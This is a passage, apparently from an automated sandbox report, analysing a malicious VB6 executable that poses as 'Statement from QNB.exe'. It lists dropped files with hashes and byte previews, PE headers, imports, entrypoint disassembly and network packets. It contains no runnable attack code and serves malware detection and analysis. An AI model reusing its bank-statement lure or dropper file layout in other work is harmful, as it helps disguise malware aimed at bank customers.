                                                                                                  SHA-512:3071E54B865EDB9C3B18E90FFFAB31DE2EC1E047C99AEB1FC36E23EF9073112685FC984BD623C6A1030A89939815D24C0F6E3675DB8893507541FF25EA21C0C8
                                                                                                  Malicious:false
                                                                                                  Preview: ..X.... .......5........{..*...y......................1.@.....$....yw.$....yw.h.B.........................4B...*...y..........................................................................................................bJ......n........................................................................................................... ........*...y...............................................................................................................................................................................................*...y_.................................~d.O$....yw....................l$....yw..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF3CDB9B0E0AB3B377.TMP
                                                                                                  Process:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6144
                                                                                                  Entropy (8bit):3.115003310802618
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rGHvFs0dSngGJ1JpK6O5r59qx6Is+W8wYry58nP0pB/ewjcYzrd67O/1:auaSnTO5rL/JUOQGJ6+
                                                                                                  MD5:30F692810BD5EBAB66D7CE4D57CDC524
                                                                                                  SHA1:B2ECD60221E921FC48B106178C725206E8BC55D6
                                                                                                  SHA-256:2B826694D17863B870015BFDF3353289E674F576DDCC183D347415E8D48A229C
                                                                                                  SHA-512:0260375B61714FC7F2B50F204FCEDD3E0D6BD34EB05C3B28773BD67AF6FD47C904534EBE16329F87F430EF3208982B98B549686FA808D6EFB455E3247A55C0DA
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF4E2873A32C413EC3.TMP
                                                                                                  Process:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.9277305547216628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
                                                                                                  MD5:19809EDD1FF00A1D7C105BC58A97CD02
                                                                                                  SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
                                                                                                  SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
                                                                                                  SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF5493C8EC3A096669.TMP
                                                                                                  Process:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.9277305547216628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
                                                                                                  MD5:19809EDD1FF00A1D7C105BC58A97CD02
                                                                                                  SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
                                                                                                  SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
                                                                                                  SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF93F550DD9A770457.TMP
                                                                                                  Process:C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6144
                                                                                                  Entropy (8bit):3.1158014050774074
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rTOdHvFs0dSngGJ1JpK6O5r59qx6Is+W8wYry58nP0pB/ewjcYzrd67O/1:vuuaSnTO5rL/JUOQGJ6+
                                                                                                  MD5:5422B44701C4BC454D012C6318201635
                                                                                                  SHA1:D0C04604ECC54F31C195349B84FCCFAA66B96426
                                                                                                  SHA-256:A33EA1D4B97C0773EF2769EEF466F45374D9A910EAA7CA1AD0381BFA2735A19B
                                                                                                  SHA-512:9B2571C248E9F040BAD4B53488F80351A3D9C070D7FAAE7F797E7935820A13FFF2A1C6A2EC9643188BBE5EAF17984E5403FF0AA35E70825F51B6A672AA732572
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF9D094ABC44AE1A89.TMP
                                                                                                  Process:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6144
                                                                                                  Entropy (8bit):3.116215512671751
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rwHvFs0dSngGJ1JpK6O5r59qx6Is+W8wYry58nP0pB/ewjcYzrd67O/1:MuaSnTO5rL/JUOQGJ6+
                                                                                                  MD5:2505F4DFDB573A5E3A08FB5FC6600628
                                                                                                  SHA1:D4DFD7A2BABC65069C33D7051E59F849D65FD0C6
                                                                                                  SHA-256:289ACAE58B770EF89008B54B5313B250E0489F6F0A983DCD344C5B510A3DEE0D
                                                                                                  SHA-512:C315287F24D4CCE04FC5BECFFF5E6966306BA77B588A670B64B4E75924853BD36089D70E0450D94741F4072C4FCE7DA4594CE19B45F731DA8067FC8391005F82
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DFB962B4444FDFF0CF.TMP
                                                                                                  Process:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.9277305547216628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
                                                                                                  MD5:19809EDD1FF00A1D7C105BC58A97CD02
                                                                                                  SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
                                                                                                  SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
                                                                                                  SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DFB9E9D901A47CB813.TMP
                                                                                                  Process:C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.9277305547216628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
                                                                                                  MD5:19809EDD1FF00A1D7C105BC58A97CD02
                                                                                                  SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
                                                                                                  SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
                                                                                                  SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DFDDED18805B00B83E.TMP
                                                                                                  Process:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6144
                                                                                                  Entropy (8bit):3.1169489296722306
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:rwHvFs0dSngGJ1JpK6O5r59qx6Is+W8wYry58nP0pB/ewjcYzrd67O/1:MuaSnTO5rL/JUOQGJ6+
                                                                                                  MD5:377920A91C09685A4DF3E22DAC3A811F
                                                                                                  SHA1:B82286459858CAA33022A9E745B3EE0F6708C701
                                                                                                  SHA-256:438D5A5E31659BBFEE95F12699F5958F11AA7F113FAC27DFEA7D408FF188222C
                                                                                                  SHA-512:C25E429E3B6C875CC020D91D14EAF7AE398349F2446167D0163D6DEAFB678C8C4005D69E0435CAC166E62A09282EE8EF4CA316C796A539B8DBEB37E0ABD42495
                                                                                                  Malicious:false
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):28
                                                                                                  Entropy (8bit):4.566108939837479
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:zQcMYdrNy:zQcMX
                                                                                                  MD5:6354CF685BFD34F58E429E503B591D05
                                                                                                  SHA1:A02F18FF5DE9F1E5C8A8D5CC60CF3F20A362950F
                                                                                                  SHA-256:0624A15A3CBA314755D3B8F3FB8F5DBDAEA76FD12340FB5488433165EAD510C1
                                                                                                  SHA-512:0843079F59C6D3385D10F9572CBC2130AC8D26BD3C65FEA1F3EF2AF1E0A04ACDDEF98BE04E35971A0EEE943BF9A0A10D9F54462ABA7EAEC692E9DDA052AF231B
                                                                                                  Malicious:false
                                                                                                  Preview: ...t...!...C.z.}E..r....
                                                                                                  C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):135168
                                                                                                  Entropy (8bit):4.787310245899602
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:tGDSlb6oBiIOhMk98Riy6NaXuknILxq+o7g8r8A0HiD:tGAtO198yNa/SoXIA4i
                                                                                                  MD5:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  SHA1:554069B1FB3A80A02840158D31C6C2826812CB40
                                                                                                  SHA-256:D63ED0450EFE28D525954D84556394F21DF1C2D882E74B4891492FEFAB00DD79
                                                                                                  SHA-512:7A6D99AB3BE3A6F43EEABACC4EB70CCD7D88F0DDED718EDC3FBABB9522E4B3B82009A0EDF95A6B4909AF90FE9E682866E6459A43A709831CC93732A8E3FF69DB
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 7%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L....f.O.....................0....................@.......................... ....... ..........................................(.......X...................................................................0... ....................................text............................... ..`.data...............................@....rsrc...X...........................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.pas
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):503090
                                                                                                  Entropy (8bit):7.87742268070775
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:FI2GIX0TnwjMqMUx0+EaTK82HUxctLuky2YvJ2uQ:ubIsnoyq0+EaWkc3Sv5Q
                                                                                                  MD5:2EEC4FEAAD2D41A806A8D3197A4F538B
                                                                                                  SHA1:4FA6A84B6A0E35C1398945189CDC684974D6EE63
                                                                                                  SHA-256:119392EE23F7CEDCB8D278E0FCD9B3FE75EC3124C4ACAB8F4129A3BA164F7DDF
                                                                                                  SHA-512:D51D53039D79C5CFB2FC06222521FF361AC0FAD27D769A5520D7AF694EFFA9FE312EE217317A766AA71A7E88F77A2A1167F288127F2FA8CC1DA322EFEE1AD153
                                                                                                  Malicious:false
                                                                                                  Preview: ..0/g..9..3Lu=..49&%.^G.1qgB\.w.q~]vuW...?';>u"3...64...Bt.E.7.DeL2t.FUL..51.iL|`F/4y.I.mSJyL.zV.\.t.50y.c..+.0WG7?.=%.L..7,;%!r5SPI0$.b.0....>o)..V.xOX@qVm1kc.@{).r62F....lL=.F...LR2.}.F.pBh*...Y-%.$.z.TUhZ..w..b...V-+.4..n.-.BZ.sFzLV.p15i.PbB...zDUg.DeM9u^jUJ..=..h.PaB..u7E.l.Df..wV..Z.Y.10...e...t7%Pg0.kL4.R.WJS.2.6iLQcE.<v6..oO"ZM&.}.ZN_26d.9.a.[..q.@c.P..L2..Kd.V.w,.V..b.fp4.k".<6.M8..BaXUQ..4m.Q.K.{sHF/}@;v3".F*Ey{b.35.xplKm9.7.c.2...ZTH@U...=.4)BwfB..w7.P..5...IB.L.M....Bc.(n.2.....1..5R.U.RS...NQ".k...0.m....g".qU.f.r.a=.S..k0.zJ.O..Xy...j.ws.)...Bjx......D..=.^Q.UQ..ydV8B..tL...D(O.....U.n..m7B....;:g'D..a..5U.UG..H..B.<ud.E9.D|$.*.5.%U..5.oM.0B.<A]u..D._*....UZ.!4L...B.?....YDl.4.V..mUZ...,|.BkD&.R.UQDW\e..ZEU.......#B.\..M`.D]D.|.y..U.:09Y.<B.i......D]D.}Ty..U._V.\...B.V.'S...D..q...XqUk..4.7].B...1.].OD6&=...9sU.E.9....B.K.....D...3....U"R7i.C..B....6..DS.7..N."U.K.Y..1.B....M..D........U.91dZ..PBx?Y.1..>Dg..J]HUQ.!vg..AB.4{2.Ok:D.7.s.FuGU[0;..%.{B
                                                                                                  C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Preview: ..
                                                                                                  C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Preview: ..
                                                                                                  C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\ut
                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  File Type:PC bitmap, Windows 3.x format, 448 x 448 x 24
                                                                                                  Category:dropped
                                                                                                  Size (bytes):602166
                                                                                                  Entropy (8bit):0.3768579929962834
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Ua40TugkKyauaoIO6AaiMGmWIeQ6wO3eTiwmzWzsAWyk2Qg6:qnqGK6
                                                                                                  MD5:60CEC598882BC2C0A0D86B721CDE8E05
                                                                                                  SHA1:24877D65780BFCB4B297FFB4D523C23417D897BD
                                                                                                  SHA-256:617DC0F82236099FD726B5A240981AC12FB145D78F7F92DD850331AE6FD0712A
                                                                                                  SHA-512:57E75904B8032402C2CE9B2CD450015246DF244B2D94C520B0A8B9874E91F6D405632CB23E5F674C4C591CCF7FF1384589D03318BF5F3C8EEC888B4E2A910C9E
                                                                                                  Malicious:false
                                                                                                  Preview: BM60......6...(....................0....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):4.787310245899602
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Statement from QNB.exe
                                                                                                  File size:135168
                                                                                                  MD5:9c8b626668e14aeb4355ea39d1520e33
                                                                                                  SHA1:554069b1fb3a80a02840158d31c6c2826812cb40
                                                                                                  SHA256:d63ed0450efe28d525954d84556394f21df1c2d882e74b4891492fefab00dd79
                                                                                                  SHA512:7a6d99ab3be3a6f43eeabacc4eb70ccd7d88f0dded718edc3fbabb9522e4b3b82009a0edf95a6b4909af90fe9e682866e6459a43a709831cc93732a8e3ff69db
                                                                                                  SSDEEP:1536:tGDSlb6oBiIOhMk98Riy6NaXuknILxq+o7g8r8A0HiD:tGAtO198yNa/SoXIA4i
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....f.O.....................0....................@........

                                                                                                  File Icon

                                                                                                  Icon Hash:981dca909cee36b0

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4013b4
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x4FBF669F [Fri May 25 11:01:51 2012 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:d77040f4614bccfda7b8aa2e04863738

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  push 00401FD0h
                                                                                                  call 00007F2204F16AC5h
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  xor byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  cmp byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  jo 00007F2204F16A78h
                                                                                                  call far 894Ah : 61125376h
                                                                                                  cwde
                                                                                                  cli
                                                                                                  dec esi
                                                                                                  xor byte ptr [ebx+ecx*2], 0000005Ch
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add dword ptr [eax], eax
                                                                                                  add byte ptr [eax], al
                                                                                                  inc ecx
                                                                                                  add byte ptr [eax], ah
                                                                                                  or byte ptr [ecx+00h], al
                                                                                                  push eax
                                                                                                  push ebp
                                                                                                  dec esp
                                                                                                  inc edi
                                                                                                  inc ecx
                                                                                                  inc esp
                                                                                                  inc ecx
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add bh, bh
                                                                                                  int3
                                                                                                  xor dword ptr [eax], eax
                                                                                                  add eax, 8B0CAF8Dh
                                                                                                  out A4h, al
                                                                                                  fiadd word ptr [edi-5Eh]
                                                                                                  xchg eax, esp
                                                                                                  xor edx, ebp
                                                                                                  mov dl, cl
                                                                                                  jc 00007F2204F16AD6h

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1de140x28.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000xf58.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x11c.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x1d31c0x1e000False0.349731445312data4.97110902784IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .data0x1f0000x141c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x210000xf580x1000False0.339111328125data3.26223123132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  CUSTOM0x21e1a0x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                                                                                                  CUSTOM0x21cdc0x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                                                                                                  RT_ICON0x214340x8a8data
                                                                                                  RT_GROUP_ICON0x214200x14data
                                                                                                  RT_VERSION0x211700x2b0dataTurkmenTurkmenistan

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                                  Version Infos

                                                                                                  DescriptionData
                                                                                                  Translation0x0442 0x04b0
                                                                                                  LegalCopyrightLips
                                                                                                  InternalNameEsothyropexy4
                                                                                                  FileVersion1.00
                                                                                                  CompanyNameLips
                                                                                                  LegalTrademarksLips
                                                                                                  ProductNameLips
                                                                                                  ProductVersion1.00
                                                                                                  FileDescriptionLips
                                                                                                  OriginalFilenameEsothyropexy4.exe

                                                                                                  Possible Origin

                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TurkmenTurkmenistan

                                                                                                  Network Behavior

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 24, 2021 14:16:12.423782110 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.423852921 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:12.424000978 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.442651987 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.442715883 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:12.494349957 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:12.494549990 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.497328043 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:12.497678041 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.633305073 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.633407116 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:12.634210110 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:12.634332895 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.637505054 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:12.680006981 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:13.020812988 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:13.021105051 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:13.021150112 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:13.021274090 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:13.021323919 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:13.021430969 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:13.089488983 CET49804443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:16:13.089545012 CET44349804142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:16:13.089551926 CET49804443192.168.11.20142.250.185.78
